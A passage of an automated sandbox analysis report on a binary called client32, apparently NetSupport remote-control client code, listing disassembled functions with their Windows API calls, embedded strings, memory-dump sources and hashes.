                                                                                                                                                                                                      • Part of subcall function 68592420: _strrchr.LIBCMT ref: 6859242E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                                                                                                                                    • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                                                                                                                    • API String ID: 2714439535-3484705551
                                                                                                                                                                                                    • Opcode ID: e7659b2a6ff5a18690e2f6621ea8dd012defe8cf504c39afbf2198268fdeb3af
                                                                                                                                                                                                    • Instruction ID: ab8864ea8cf839c0dac882c909dfb3055c68c0a934503256c46ccfb76580efe1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7659b2a6ff5a18690e2f6621ea8dd012defe8cf504c39afbf2198268fdeb3af
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C841F8759402599BEF10DB59DC55FFEB378EB45704FC00095EE29A2240EB319E84CF62
                                                                                                                                                                                                    Function 110FFE60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110883C0: UnhookWindowsHookEx.USER32(?), ref: 110883E3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FFE7C
                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000), ref: 110FFE83
                                                                                                                                                                                                    • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFE93
                                                                                                                                                                                                    • SetThreadDesktop.USER32(00000000), ref: 110FFEA0
                                                                                                                                                                                                    • CloseDesktop.USER32(00000000), ref: 110FFEB9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 110FFEC1
                                                                                                                                                                                                    • CloseDesktop.USER32(00000000), ref: 110FFED7
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 110FFEDF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • SetThreadDesktop(%s) ok, xrefs: 110FFEAB
                                                                                                                                                                                                    • SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFEC9
                                                                                                                                                                                                    • OpenDesktop(%s) failed, e=%d, xrefs: 110FFEE7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                                                                                                    • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                                                                                                    • API String ID: 2036220054-60805735
                                                                                                                                                                                                    • Opcode ID: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                                                                                                    • Instruction ID: 156f0d79109f07c40c4ac8670e692553d53260d930ebdb42a1d89f925a608cc0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9811947AF0022767D2116FB06C89B6FBA18AF8561DF104038FA1B85581EF24A94483F3
                                                                                                                                                                                                    Function 1115AB80 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115ABA8
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1115ABB5
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1115ABC8
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AC0C
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AC19
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                                                                                                    • API String ID: 1734919802-1728070458
                                                                                                                                                                                                    • Opcode ID: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                                                                                                    • Instruction ID: 447bd79fb7e316194c8fbcf3240c79f01d8f25fe8b238cd57140670aacafd43f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7811C475D01319AFC720EFFA9DC09AAF7B8FF01319B40462EE56653540EA7095408B5A
                                                                                                                                                                                                    Function 1110D060 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1110D0CA
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1110D0DF
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1110D0F6
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D109
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D118
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D1DF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                                                                                                    • API String ID: 144328431-1024648535
                                                                                                                                                                                                    • Opcode ID: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
                                                                                                                                                                                                    • Instruction ID: 09a7b7f2a39b786243c3074fc4a04aff0e2c3ee4e0c0e7a142bf3ec4b628a9f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F941C075E01315ABDB12CFA98D84BAEFBE4FB88718F54852AE819D3244E731A5008B51
                                                                                                                                                                                                    Function 11158220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,24DE4E77,?,00000000,00000001), ref: 11158267
                                                                                                                                                                                                    • CoCreateInstance.OLE32(111C06FC,00000000,00000017,111C062C,?), ref: 11158287
                                                                                                                                                                                                    • wsprintfW.USER32 ref: 111582A7
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 111582B3
                                                                                                                                                                                                    • wsprintfW.USER32 ref: 11158367
                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 11158408
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                                                                                    • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                                                                                    • API String ID: 3050498177-823534439
                                                                                                                                                                                                    • Opcode ID: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                                                                                                    • Instruction ID: 5c9d69ea3c7034288904af0a1b42e56c7497ab7ebaebdabd712d66f14354dd8e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A517071B00219AFD7A0DB69CC94F9BF7B9FB8A714F1042A9E819D7251D630AE40CF51
                                                                                                                                                                                                    Function 11112B00 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11112B55
                                                                                                                                                                                                    • CoCreateInstance.OLE32(111BBF3C,00000000,00000001,111BBF4C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B1EB), ref: 11112B6F
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11112B94
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11112BA6
                                                                                                                                                                                                    • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11112BB9
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11112BC5
                                                                                                                                                                                                    • CoUninitialize.COMBASE(00000000), ref: 11112C61
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                                                                                                    • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                                                                                                    • API String ID: 4195908086-2348320231
                                                                                                                                                                                                    • Opcode ID: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                                                                                                    • Instruction ID: 68fa62bcea783be6e527966318309be417962e86cfe8c7ca8d2a125abe7bdbbc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28dcea0cc7f8a025214f6af9fd2057e380903a455cb1bbc279c23e6119f70c8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00515DB5A002169FDB04DFE5C9C4AEFFBB9FF88304F218569E615AB244D730A941CB61
                                                                                                                                                                                                    Function 685A2F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _calloc.LIBCMT ref: 685A2FBB
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 685A300D
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 685A301B
                                                                                                                                                                                                    • _calloc.LIBCMT ref: 685A303B
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 685A3049
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 685A307F
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000304,?,?,?,?,?,?,?,?,?,?,?,?,?,?,97A234B3), ref: 685A308C
                                                                                                                                                                                                      • Part of subcall function 685A28D0: wsprintfA.USER32 ref: 685A2965
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                                                                                                                    • String ID: a3Zh$a3Zh
                                                                                                                                                                                                    • API String ID: 3178096747-1469771974
                                                                                                                                                                                                    • Opcode ID: c3b386c5d1f3d419a61cc250ec1f38c9d0b35944b3ff5a5a76c454e13496c827
                                                                                                                                                                                                    • Instruction ID: 34c56f1df615941f22e7a00de43ead90c8a12db29b9b1b45dd867d994322e2e9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3b386c5d1f3d419a61cc250ec1f38c9d0b35944b3ff5a5a76c454e13496c827
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 104137B5D00209AFDB10DFA5D885AEFB7F8FF88304F408516E915E7240E7759A458BA1
                                                                                                                                                                                                    Function 685B0D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,685B0F2B,25DC70BF,00000000,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D48
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 685B0D5B
                                                                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-685DCB4C,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D76
                                                                                                                                                                                                    • _malloc.LIBCMT ref: 685B0D8C
                                                                                                                                                                                                      • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                                                                                                      • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                                                                                                      • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?), ref: 685B0D9F
                                                                                                                                                                                                    • _free.LIBCMT ref: 685B0D84
                                                                                                                                                                                                      • Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
                                                                                                                                                                                                      • Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25
                                                                                                                                                                                                    • _free.LIBCMT ref: 685B0DAF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
